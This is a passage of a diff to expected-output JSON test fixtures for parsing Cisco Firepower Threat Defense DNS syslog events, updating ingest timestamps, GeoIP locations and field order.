"ingress": { "interface": { @@ -390,7 +372,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096904600Z", + "ingested": "2021-12-14T14:37:39.593552298Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -453,37 +435,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "www.elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "www.elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -492,15 +468,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -539,7 +515,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096910500Z", + "ingested": "2021-12-14T14:37:39.593552639Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", @@ -604,37 +580,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -643,15 +613,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -690,7 +660,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096921600Z", + "ingested": "2021-12-14T14:37:39.593552990Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", @@ -754,37 +724,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -793,15 +757,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -840,7 +804,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096928100Z", + "ingested": "2021-12-14T14:37:39.593553336Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", @@ -903,37 +867,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -942,15 +900,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -989,7 +947,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096934500Z", + "ingested": "2021-12-14T14:37:39.593553740Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1055,37 +1013,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1094,15 +1046,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1141,7 +1093,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096940100Z", + "ingested": "2021-12-14T14:37:39.593554068Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -1204,37 +1156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "SERVFAIL" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "SERVFAIL" }, "source": { "address": "10.0.1.20", @@ -1243,15 +1189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1290,7 +1236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096946300Z", + "ingested": "2021-12-14T14:37:39.593554416Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -1354,37 +1300,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1393,15 +1333,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1440,7 +1380,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096952400Z", + "ingested": "2021-12-14T14:37:39.593554749Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1505,37 +1445,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "refusedthis.com", - "type": "A" - }, - "response_code": "REFUSED" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "refusedthis.com", + "type": "A" + }, + "response_code": "REFUSED" }, "source": { "address": "10.0.1.20", @@ -1544,15 +1478,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1591,7 +1525,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096958500Z", + "ingested": "2021-12-14T14:37:39.593578654Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", @@ -1654,33 +1588,27 @@ "log": { "level": "alert" }, + "dns": { + "response_code": "SERVFAIL" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "81.2.69.144", - "packets": 4 - }, - "dns": { - "response_code": "SERVFAIL" + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -1689,15 +1617,15 @@ "packets": 6, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "tcp", "application": "dns client", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1736,7 +1664,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096965100Z", + "ingested": "2021-12-14T14:37:39.593580185Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1797,37 +1725,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "laskdfjlaksdf.elastic.co", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "laskdfjlaksdf.elastic.co", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -1836,15 +1758,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1883,7 +1805,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096971200Z", + "ingested": "2021-12-14T14:37:39.593580575Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", @@ -1947,37 +1869,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "ns-1168.awsdns-18.org", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "ns-1168.awsdns-18.org", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1986,15 +1902,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2033,7 +1949,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096977300Z", + "ingested": "2021-12-14T14:37:39.593580919Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2096,37 +2012,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "_http._tcp.security.ubuntu.com", - "type": "SRV" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "_http._tcp.security.ubuntu.com", + "type": "SRV" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -2135,15 +2045,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2182,7 +2092,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096983500Z", + "ingested": "2021-12-14T14:37:39.593581252Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", @@ -2246,37 +2156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2285,15 +2189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2332,7 +2236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096989700Z", + "ingested": "2021-12-14T14:37:39.593581586Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2397,37 +2301,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2436,15 +2334,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2483,7 +2381,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096996Z", + "ingested": "2021-12-14T14:37:39.593582019Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start 